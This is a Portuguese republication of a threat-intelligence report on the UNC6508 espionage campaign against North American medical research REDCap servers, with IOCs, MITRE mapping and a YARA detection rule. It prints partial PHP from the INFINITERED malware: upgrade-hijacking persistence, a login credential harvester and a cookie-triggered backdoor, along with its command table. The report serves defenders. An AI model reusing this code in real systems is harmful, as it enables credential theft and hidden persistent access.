15 de junho de 202617 min de leitura

Ameaça cibernética chinesa atinge pesquisa médica: análise da campanha UNC6508 e o malware INFINITERED

Google Threat Intelligence Group

Google Cloud

Banner - Ameaça cibernética chinesa atinge pesquisa médica: análise da campanha UNC6508 e o malware INFINITERED

TL;DR: Este artigo analisa a campanha UNC6508, grupo de espionagem cibernética vinculado à China que comprometeu servidores REDCap de instituições de pesquisa médica na América do Norte, utilizando o malware INFINITERED para roubar credenciais e posteriormente abusar de regras de conformidade do Google Workspace para exfiltrar e-mails. A principal conclusão é a necessidade de aplicar patches rigorosos, habilitar 2-Step Verification e monitorar regras de conformidade em ambientes de produtividade corporativa.

O Google Threat Intelligence Group (GTIG) identificou uma campanha sofisticada atribuída ao UNC6508, um ator de ameaças vinculado à República Popular da China (PRC), que teve como alvo instituições da comunidade acadêmica, médica e de pesquisa militar na América do Norte. Durante mais de um ano sem ser detectado, o ator explorou aplicações web expostas, implantou malware personalizado, pivotou para sistemas internos sensíveis e abusou de ferramentas administrativas empresariais para exfiltração encoberta de dados. As ambições de coleta incluíam inteligência de defesa relacionada à segurança nacional, operações do Comando Indo-Pacífico, inteligência artificial, sistemas de veículos não tripulados, programas ofensivos cibernéticos e pesquisa médica.

O GTIG interrompeu a infraestrutura maliciosa associada a este ator. Trabalhando com a Mandiant Consulting, notificamos as organizações afetadas e oferecemos assistência na remediação. Atualizamos o Google Security Operations (SecOps) com inteligência relevante, permitindo que defensores identifiquem indicadores de comprometimento (IOCs) em suas redes. Recomendamos que todos os usuários sigam as melhores práticas recomendadas para provedores de identidade de terceiros (IdP) e garantam que a verificação em duas etapas (2SV) esteja habilitada em todas as contas.

Como a campanha aconteceu?

A campanha teve como alvo um conjunto diversificado de entidades médicas nacionais, estaduais e privadas – provedores clínicos de renome mundial, centros acadêmicos de ponta, instituições militares de saúde norte-americanas, grupos de defesa profissional e órgãos reguladores de saúde. Suas áreas de pesquisa abrangem desde descoberta molecular até ensaios clínicos de medicamentos, políticas de saúde pública e prontidão militar. Empregam milhares de pessoas com um orçamento combinado de pesquisa na casa dos bilhões de dólares.

O comprometimento mais antigo conhecido ocorreu em setembro de 2023. O ator explorou servidores REDCap (Research Electronic Data Capture) expostos e implantou um malware personalizado chamado INFINITERED para capturar credenciais legítimas do REDCap. Após ficar oculto por mais de um ano, o UNC6508 usou as credenciais capturadas para acessar a rede interna da vítima. Também foi observado o uso de uma técnica inédita: manipulação de regras de conformidade de conteúdo do domínio para exfiltração de dados. Por fim, o ator empregou técnicas sofisticadas de operations security (OpSec) para ocultar suas atividades.

O GTIG colaborou com Mandiant Consulting, o time FLARE e o Workspace Security para combinar inteligência de ameaças, resposta a incidentes e engenharia reversa. Isso permitiu desenvolver um quadro completo do ciclo de vida do ataque, desde o comprometimento inicial até o cumprimento da missão.

Prevenção, detecção e remediação

O GTIG recomenda que os defensores implementem as seguintes medidas de segurança em todas as plataformas corporativas cloud para mitigar essa ameaça:

  • Proteger contas de administrador: aplicar verificação em duas etapas resistente a phishing (2SV) para contas de administrador, inclusive por meio de provedores de identidade de terceiros.
  • Proteção avançada: considere inscrever contas altamente sensíveis no Advanced Protection Program para proteção adicional contra malware e ataques de phishing.
  • Prevenir roubo de cookies: aplique Device Bound Session Credentials (DBSC) com Context-Aware Access (CAA) para contas sensíveis em dispositivos Windows.
  • Monitorar logs de auditoria: habilite logs de auditoria para analisar, monitorar e alertar sobre mudanças nos dados.
  • Controlar dados: defina regras de Data Loss Prevention (DLP) para bloquear ou alertar sobre compartilhamento externo de dados sensíveis.
  • Auditar regras de conformidade: revise logs de auditoria de administrador e regras de conformidade para modificações não autorizadas.
  • Cobertura SIEM: considere usar Google Security Operations (SecOps) e garanta que os logs do Workspace estejam incluídos no pipeline de SIEM.
  • Proteção de senhas: use o Chrome Enterprise Password Leak Detection para alertar sobre uso de senhas potencialmente comprometidas.
  • Atualizar REDCap: mantenha as instalações do REDCap atualizadas e remova versões antigas completamente.
  • Monitorar INFINITERED: verifique servidores REDCap quanto à presença de INFINITERED usando a regra YARA e IOCs fornecidos.

Comprometimento de universidade de pesquisa médica

Em setembro de 2023, um servidor REDCap de uma instituição de pesquisa médica norte-americana foi comprometido. Atividade contínua foi observada até novembro de 2025. Durante este período, o UNC6508 executou a seguinte cadeia de ataque:

  1. Exploração do servidor REDCap.
  2. Após três meses, implantação do malware INFINITERED.
  3. INFINITERED registra credenciais silenciosamente e persiste através de upgrades por mais de um ano.
  4. Pivot para uma conta de administrador de domínio.
  5. Adição de uma regra de conformidade de conteúdo maliciosa.
  6. Encaminhamento silencioso (BCC) de e-mails correspondentes para uma conta controlada pelo ator.

Diagrama do fluxo do ataque
Figura 1: Diagrama do fluxo do ataque da campanha.

Acesso inicial: Exploração do REDCap e INFINITERED

O UNC6508 tem como alvo consistente servidores REDCap. REDCap é uma plataforma web projetada para construir e gerenciar bancos de dados e pesquisas online, em conformidade com regulamentações de pesquisa médica e científica. É uma plataforma comum na comunidade de pesquisa médica norte-americana.

O GTIG não conseguiu confirmar como o UNC6508 obteve acesso inicial ao servidor REDCap. Por design, o REDCap permite que administradores mantenham versões legadas lado a lado com a versão atual. O UNC6508 foi observado sondando essas versões vulneráveis em vários sistemas REDCap de organizações alvo. Isso destaca a importância crescente de aplicar patches de segurança rapidamente e remover versões antigas para evitar downgrade attacks.

Após estabelecer uma posição no servidor REDCap, o UNC6508 realizou reconhecimento interno e descoberta de credenciais para obter credenciais de banco de dados e contas de serviço. O ator também implantou um web shell chamado "help.php", que manteve persistência e funcionou como um uploader na aplicação REDCap.

Análise do INFINITERED

Três meses após o comprometimento inicial, o UNC6508 implantou um payload de malware personalizado rastreado como INFINITERED. Este malware implementa sua funcionalidade em três componentes modulares distintos, trojanizando arquivos legítimos do sistema REDCap.

  • Dropper e interceptação de upgrade
  • Coletor de credenciais
  • Backdoor com comando e controle (C2)

O GTIG descobriu múltiplas organizações nos EUA e Canadá comprometidas com INFINITERED. Todas foram notificadas prontamente.

Diagrama do INFINITERED
Figura 2: Diagrama do INFINITERED.

Dropper e interceptação de upgrade

Para manter acesso remoto persistente, o INFINITERED injeta seu código em novas versões do REDCap interceptando o processo de upgrade. Esta capacidade é incorporada ao arquivo legítimo do sistema de upgrade. A injeção segue estas etapas:

  1. Ler a versão atual do software, que inclui o código INFINITERED.
  2. Extrair a lógica maliciosa usando o delimitador GUID b49e334d-9c01-463e-9bc5-00a6920fb66e.
  3. Injetar código backdoor no arquivo de configuração de hooks personalizados.
  4. Injetar código coletor de credenciais no arquivo do sistema de autenticação.
  5. Injetar o código extraído da etapa 2 no arquivo de upgrade.

Em ambientes Elastic Beanstalk, o INFINITERED executa etapas adicionais para garantir persistência em implantações cloud.

// b49e334d-9c01-463e-9bc5-00a6920fb66e
...
$file_upgrade = $base_path."Upgrade.php"; 
$file_content_upgrade = $zip->getFromName($file_upgrade); // new upgrade file content
$file_content_upgrade_local = file_get_contents(__FILE__); // Contents of the current file 
...
if ($file_content_upgrade !== false) {
    // Base64 GUID delimiter
    $dummy_marker = base64_decode('YjQ5ZTMzNGQtOWMwMS00NjNlLTliYzUtMDBhNjkyMGZiNjZl');
    $pattern = "/$dummy_marker(.*?)$dummy_marker/s";
    if (preg_match($pattern, $file_content_upgrade_local, $matches)) {
        $extracted_text = $matches[0];
        $search_content = "// If running on AWS Elastic Beanstalk"; 
        $upgrade_decode = "// ".$extracted_text."\r\n\t\t".$search_content;
        $new_content = str_replace($search_content, $upgrade_decode, $file_content_upgrade);
        $zip->deleteName($file_upgrade);
        $zip->addFromString($file_upgrade, $new_content);
    }
}
$zip->close();
...
// b49e334d-9c01-463e-9bc5-00a6920fb66e

Código 1: Interceptação de upgrades e injeção de código INFINITERED.

Coletor de credenciais

O INFINITERED injeta um coletor de credenciais no arquivo do sistema de autenticação para comprometer contas de usuário. Este componente captura nomes de usuário e senhas enviados via POST durante o login. As credenciais são criptografadas usando a rotina de criptografia padrão do ambiente e ocultadas em uma tabela local do banco de dados de sessões do REDCap, com o prefixo "xc32038474a" no Session ID.

$currentUTC = gmdate('Y-m-d H:i:s');
$str = encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);
include dirname(__FILE__, 3) . DIRECTORY_SEPARATOR . 'redcap_connect.php';
$expiration_timestamp = strtotime("+60 days", strtotime($currentUTC));
$session_id = 'xc32038474a'.substr(bin2hex($currentUTC), -20);
$session_sql = "INSERT INTO [REDACTED] ([REDACTED],[REDACTED],[REDACTED]) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))";
@$rc_connection->query($session_sql);

Código 2: Credenciais ocultadas em tabela legítima do banco de dados.

Backdoor

O INFINITERED também possui funcionalidade backdoor estabelecida no arquivo de hooks personalizados dentro do pacote de upgrade, especificamente em uma função executada em cada carregamento de página do REDCap. Esse hook global garante que o backdoor seja executado em cada requisição. O INFINITERED procura um parâmetro de cookie HTTP chamado "REDCAP-TOKEN" e um valor de cookie iniciando com uma string específica. Se presentes, o malware remove o prefixo e descriptografa o payload restante com a rotina de descriptografia padrão.

$cookieValue = $_COOKIE['REDCAP-TOKEN'];
if ($cookieValue) {
    $magic_flag = '[REDACTED]'; // Cookie prefix
    ...
    // Decrypt message if cookie prefix is found
    $key = '[REDACTED]';
    $req_data = substr($cookieValue, strlen($magic_flag));
    $req_data = decrypt($req_data, $key);

Código 3: Descriptografia de comandos para o INFINITERED.

Se o payload descriptografado estiver vazio, o malware atua como beacon, retornando detalhes do sistema como OS, versão do PHP, diretório de trabalho e credenciais do banco de dados. Quando não vazio, o malware analisa o payload em busca de tags de comando, que o ator pode usar para executar comandos shell, consultas SQL arbitrárias e transferir arquivos.

Comandos suportados

Tag de Comando Descrição
00 Executa comandos arbitrários do sistema usando shell_exec.
02 Faz upload de um arquivo para o servidor. O payload contém o caminho de destino e o conteúdo.
03 Recupera credenciais roubadas armazenadas na tabela legítima do banco de dados.
04 Exclui os registros de credenciais roubadas da tabela legítima.
05 Executa consultas SQL arbitrárias e retorna os resultados.
ej671a16i7fd8202nu6ltfg5p6x7u Baixa um arquivo arbitrário do servidor. O payload especifica o caminho completo.
Payload vazio Beacon com informações do sistema, credenciais do banco de dados e detalhes de configuração.

Tabela 1: Comandos suportados pelo INFINITERED.

Sua organização utiliza servidores REDCap ou ambientes Google Workspace? Fortaleça sua postura de segurança com as soluções de SecOps e FinOps da Nuvem Online.

Abuso de regras de conformidade de conteúdo do domínio

Mais de um ano após o comprometimento inicial, o UNC6508 usou credenciais sobrepostas, coletadas do REDCap, para acessar uma conta de administrador. Isso ressalta o desafio e a importância de proteger sistemas de forma holística. Defensores devem habilitar 2-Step Verification (2SV) e garantir o uso de credenciais únicas em diferentes domínios de segurança para mitigar ataques de reuso de credenciais.

O UNC6508 então aproveitou as regras de conformidade de conteúdo, um recurso legítimo presente em muitos suites de produtividade empresarial baseados em cloud, para exfiltrar comunicações de e-mail específicas. Administradores podem criar essas regras para gerenciar mensagens que contenham conjuntos predefinidos de palavras, frases, padrões de texto ou numéricos. Por padrão, as regras de conformidade se aplicam a todos os usuários de uma unidade organizacional. O uso de regras de conformidade para exfiltração de dados é uma técnica inédita não observada anteriormente com atores vinculados à PRC.

Especificamente, o UNC6508 criou uma regra de conformidade chamada "Patroit" [sic] que usava expressões regulares para corresponder a padrões de palavras-chave e endereços de e-mail em e-mails enviados ou recebidos. As correspondências eram encaminhadas silenciosamente (BCC) para um endereço Gmail controlado pelo ator: BebitaBarefoot774[@]gmail[.]com, fornecendo um fluxo encoberto e contínuo de dados exfiltrados. Ao descobrir, o GTIG desabilitou a conta Gmail para impedir novas exfiltrações.

Categorias de coleta de inteligência
Figura 3: Categorias de coleta de inteligência direcionadas.

Os padrões usados na regra "Patroit" sugerem coleta estratégica de inteligência geopolítica, estratégia militar, tecnologia avançada e pesquisa médica. Os padrões também incluem endereços de e-mail profissionais e números de telefone de membros de organizações nessas áreas. Vários termos aplicados têm erros ortográficos, sugerindo que a lista era mantida manualmente.

Este escopo ambicioso de coleta de inteligência do UNC6508 pode sugerir um alcance mais amplo de alvos além das vítimas identificadas na comunidade de pesquisa médica. O GTIG avalia que essas prioridades de coleta estão alinhadas com os interesses estratégicos da República Popular da China.

Embora a maioria dos termos se relacione com defesa e tecnologia, os termos que mencionam instalações de pesquisa médica e o patógeno específico “Chikungunya” se destacam. Chikungunya é uma doença viral transmitida por mosquitos e foi responsável por um surto na província de Guangdong, China, a partir de julho de 2025.

Operations Security (OpSec)

O GTIG observou que o UNC6508 utilizou técnicas OpSec sofisticadas e meticulosas para ocultar suas atividades dos defensores.

Técnicas de segurança operacional do UNC6508
Figura 4: Técnicas de segurança operacional do UNC6508.

O UNC6508 dependia fortemente de redes de ofuscação (OBF). Essa estratégia, agora frequentemente empregada por atores PRC-nexus, envolve rotear o tráfego de operações ofensivas através de uma mistura de roteadores comprometidos, proxies residenciais, servidores VPS e outros dispositivos.

Esta operação usou exclusivamente endereços IP de redes OBF baseados nos EUA para acessar tanto a conta "BebitaBarefoot774[@]gmail[.]com" quanto para reutilizar credenciais legítimas ao acessar a conta de administrador corporativa comprometida. Técnicas adicionais de OpSec foram usadas, como obter a conta Gmail controlada pelo ator através de um serviço de criação em massa e dedicá-la exclusivamente à exfiltração de e-mail.

Ao manter um alto nível de OpSec, o UNC6508 complica significativamente os esforços dos defensores para identificar padrões maliciosos, estabelecer atribuição precisa e mapear a infraestrutura do ator.

Atribuição

O GTIG atribui esta atividade ao UNC6508 com alta confiança. Essa avaliação é baseada em sobreposições de infraestrutura entre campanhas, o uso consistente do backdoor INFINITERED em servidores REDCap e o direcionamento específico dos setores de pesquisa médica e defesa. Avaliamos que UNC6508 é um cluster de ameaças com motivação de espionagem, com prioridades alinhadas às tendências históricas de espionagem patrocinada pelo estado PRC e requisitos de coleta de inteligência.

Indicadores de Comprometimento (IOCs)

Para auxiliar a comunidade, incluímos uma lista de indicadores em uma coleção GTI para usuários registrados.

Indicadores de rede

Indicador Tipo Contexto
[email protected] Email Conta de exfiltração de e-mail
23.169.65.49 IP Origem do login de administrador (roteador ASUS comprometido)

Indicadores de arquivo

Descrição SHA256
Persistência (help.php) ba6b73b0ca0dc7f86b3b397893ac32d729fd53f9df20643288f141f29d020af7
Coletor de credenciais db65c1b9f9e4cb4d729f45ad4b6fcf3e277caf9eb4c875425dec93fd883f9136
Coletor de credenciais c1ac43d23f89d41eb4ff131678ab562ab2cfed9aa334b13767ef141d303b0e5b
Backdoor 8f0158855a656b629ca76ebca565f18bc25563ded34b65d6771632c20edb68ec
Backdoor 51a57bfc9ed3eb6451c1c289607814d59e1698c666fb97ac5f694c398f23d045
Dropper 4efbef69eb3b09bacff892d6a55778d07c418e7f15eba3cf1245e8cdfd8dda0b
Dropper 58bb25777e0aa86bcd2125101e0bca4e8732b03d91bd8d2f205b446a2a8d5c86

Indicadores de host

Indicador Descrição
b49e334d-9c01-463e-9bc5-00a6920fb66e Delimitador GUID da versão atual do INFINITERED
xc32038474a Prefixo do Session ID no banco de dados REDCap do INFINITERED

Mapeamento MITRE ATT&CK

Tática ID da Técnica Nome da Técnica Contexto/Atividade
Initial Access T1190 Exploit Public-Facing Application Exploração de servidores de gerenciamento de pesquisa REDCap
Persistence T1505.003 Server Software Component: Web Shell Implantação de INFINITERED e uploaders
Persistence T1554 Compromise Client Software Binary Modificação do REDCap para interceptar upgrades
Defense Evasion T1027 Obfuscated Files or Information Uso de codificação Base64 para payloads maliciosos
Defense Evasion T1090.003 Proxy: Multi-hop Proxy Roteamento de tráfego através de dispositivos IoT comprometidos (redes OBF)
Defense Evasion T1562.001 Impair Defenses: Disable or Modify Tools Criação de regras BCC "silenciosas" para evitar detecção
Defense Evasion T1689 Downgrade Attack Exploração de versões legadas vulneráveis do REDCap
Credential Access T1555 Credentials from Password Stores Acesso a arquivos de configuração locais
Credential Access T1056.003 Input Capture: Web Portal Capture INFINITERED capturando credenciais em texto claro de requisições POST
Collection T1114.003 Email Collection: Email Forwarding Rule Uso de regras de conformidade de conteúdo ("Patroit") para exfiltração automática
Collection T1213 Data from Information Repositories Busca em armazenamento e e-mail por palavras-chave estratégicas
Command and Control T1071.001 Application Layer Protocol: Web Protocols Comunicação C2 via parâmetros de cookie HTTP (REDCAP-TOKEN)
Exfiltration T1567 Exfiltration Over Web Service Encaminhamento silencioso de dados sensíveis para contas Gmail do ator
Exfiltration T1071.001 Application Layer Protocol: Web Protocols Resposta HTTP aos comandos C2

Detecções

Regras YARA

rule G_Backdoor_INFINITERED_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$magic_flag = "ej671a16i7fd8202nu6ltfg5p6x7u"
		$magic_flag_base64 = "ej671a16i7fd8202nu6ltfg5p6x7u" base64
		$marker = "b49e334d-9c01-463e-9bc5-00a6920fb66e"
		$marker_base64 = "YjQ5ZTMzNGQtOWMwMS00NjNlLTliYzUtMDBhNjkyMGZiNjZl"
		$s1 = "substr($cookieValue, strlen($magic_flag));"
		$s2 = "getcwd(), php_uname(), phpversion(), $_SERVER['SERVER_SOFTWARE']"
		$s3 = "'data' => encrypt($data, $key)"
		$s4 = "$data = shell_exec($command);"
		$s5 = "move_uploaded_file($tmpPath, $fileName)"
		$s6 = "$data = implode('|', $fields)"
		$b_s1 = "substr($cookieValue, strlen($magic_flag));" base64
		$b_s2 = "getcwd(), php_uname(), phpversion(), $_SERVER['SERVER_SOFTWARE']" base64
		$b_s3 = "'data' => encrypt($data, $key)" base64
		$b_s4 = "$data = shell_exec($command);" base64
		$b_s5 = "move_uploaded_file($tmpPath, $fileName)" base64
		$b_s6 = "$data = implode('|', $fields)" base64
		$t1 = "(isset($_POST['username']) && $_POST['password'])"
		$t2 = "INSERT INTO redcap_sessions (session_id, session_data, session_expiration) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))"
		$t3 = "encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);"
		$t4 = "redcap_connect.php"
		$b_t1 = "(isset($_POST['username']) && $_POST['password'])" base64
		$b_t2 = "INSERT INTO redcap_sessions (session_id, session_data, session_expiration) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))" base64
		$b_t3 = "encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);" base64
		$b_t4 = "redcap_connect.php" base64
		$u1 = "$zip->open($filename) === TRUE)"
		$u2 = "$hooks_encode ="
		$u3 = "$auth_encode ="
		$u4 = "$file_content_hooks = $zip->getFromName($file_hooks);"
		$u5 = "$file_content_auth = $zip->getFromName($file_auth);"
		$u6 = "$file_content_upgrade = $zip->getFromName($file_upgrade);"
		$u7 = "str_replace($search_content, $hooks_decode, $file_content_hooks);"
		$u8 = "str_replace($search_content, $upgrade_decode, $file_content_upgrade);"
		$u9 = "str_replace($search_content, $auth_decode, $file_content_auth);"
		$b_u1 = "$zip->open($filename) === TRUE)" base64
		$b_u2 = "$hooks_encode =" base64
		$b_u3 = "$auth_encode =" base64
		$b_u4 = "$file_content_hooks = $zip->getFromName($file_hooks);" base64
		$b_u5 = "$file_content_auth = $zip->getFromName($file_auth);" base64
		$b_u6 = "$file_content_upgrade = $zip->getFromName($file_upgrade);" base64
		$b_u7 = "str_replace($search_content, $hooks_decode, $file_content_hooks);" base64
		$b_u8 = "str_replace($search_content, $upgrade_decode, $file_content_upgrade);" base64
		$b_u9 = "str_replace($search_content, $auth_decode, $file_content_auth);" base64
		$filemarker = "<?php"
	condition:
		filesize < 1MB and $filemarker in (0 .. 128) and (((any of ($magic*) or any of ($marker*)) and (any of ($s*) or any of ($t*) or any of ($u*))) or 4 of ($s*) or 4 of ($b_s*) or all of ($t*) or all of ($b_t*) or 6 of ($u*) or 6 of ($b_u*))
}

Perguntas Frequentes

  • O que é o malware INFINITERED?

    • INFINITERED é um malware personalizado desenvolvido pelo grupo UNC6508 para atacar servidores REDCap. Ele possui três módulos: um dropper que intercepta upgrades do REDCap, um coletor de credenciais e um backdoor com comunicação C2 via cookies HTTP. O malware persiste por mais de um ano e continua funcionando mesmo após atualizações legítimas do software.

  • Como o grupo UNC6508 exfiltrou dados?

    • Após obter acesso a uma conta de administrador, o grupo criou uma regra de conformidade de conteúdo chamada 'Patroit' no Google Workspace. Essa regra usava expressões regulares para identificar e-mails com palavras-chave de interesse e os encaminhava silenciosamente (BCC) para um endereço Gmail controlado pelos atacantes, sem o conhecimento do usuário.

  • O que é um downgrade attack e como ele foi usado?

    • Um downgrade attack explora versões antigas ou vulneráveis de software que permanecem instaladas lado a lado com a versão atual. No caso, o REDCap permite manter versões legadas. UNC6508 sondou essas versões vulneráveis para obter acesso inicial. A remoção completa de versões desatualizadas é essencial para mitigar esse vetor.

  • Quais medidas de segurança são recomendadas para evitar esse tipo de ataque?

    • O Google Threat Intelligence Group recomenda: habilitar 2-Step Verification (2SV) resistente a phishing para contas de administrador, usar o programa Advanced Protection, implementar Device Bound Session Credentials (DBSC), monitorar logs de auditoria, definir regras DLP, revisar regras de conformidade periodicamente e manter o REDCap sempre atualizado, removendo versões antigas.

  • Empresas brasileiras que usam REDCap ou Google Workspace estão vulneráveis?

    • Embora a campanha tenha mirado instituições norte-americanas, as técnicas empregadas são universais. Qualquer organização que utilize REDCap, Google Workspace ou provedores similares deve considerar os mesmos riscos, principalmente se realizar pesquisas sensíveis. A adoção de 2SV, patch management e monitoramento de regras de conformidade são práticas recomendadas independentemente da localização.

Artigo originalmente publicado por Google Threat Intelligence Group em Cloud Blog.

Tags:
#SegurançaCibernética#ThreatIntelligence#Malware#REDCap#EspionagemCibernética#GoogleWorkspace
Gostou? Compartilhe:

Você também pode gostar

Benchmarks no Microsoft Foundry (preview): Avaliação padronizada de modelos e agentes de IA

Benchmarks no Microsoft Foundry (preview): Avaliação padronizada de modelos e agentes de IA

O que realmente importa no AWS Weekly Roundup (15/06/26): FinOps Agent, Gemma 4 e o salto do Graviton5

O que realmente importa no AWS Weekly Roundup (15/06/26): FinOps Agent, Gemma 4 e o salto do Graviton5

Precisa de ajuda?Fale com nossos especialistas 👋
Avatar Walcew - Headset